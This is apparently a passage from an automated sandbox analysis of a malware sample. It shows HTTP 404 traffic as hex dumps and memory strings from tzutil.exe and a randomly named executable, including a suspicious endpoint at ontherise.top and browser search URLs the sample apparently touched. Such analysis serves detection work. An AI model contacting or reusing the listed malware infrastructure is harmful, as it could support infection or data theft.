34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Wed, 11 Dec 2024 14:05:15 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Wed, 11 Dec 2024 14:05:18 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 14:05:24 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 14:05:27 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 14:05:30 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 14:05:32 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: tzutil.exe, 0000000B.00000002.3118417486.0000000004E02000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000002.3117680832.00000000038C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
                Source: hKAQraLbCUKXj.exe, 0000000C.00000002.3119039119.0000000004E99000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ontherise.top
                Source: hKAQraLbCUKXj.exe, 0000000C.00000002.3119039119.0000000004E99000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ontherise.top/wr6c/
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tzutil.exe, 0000000B.00000002.3118417486.0000000004F94000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000002.3117680832.0000000003A54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
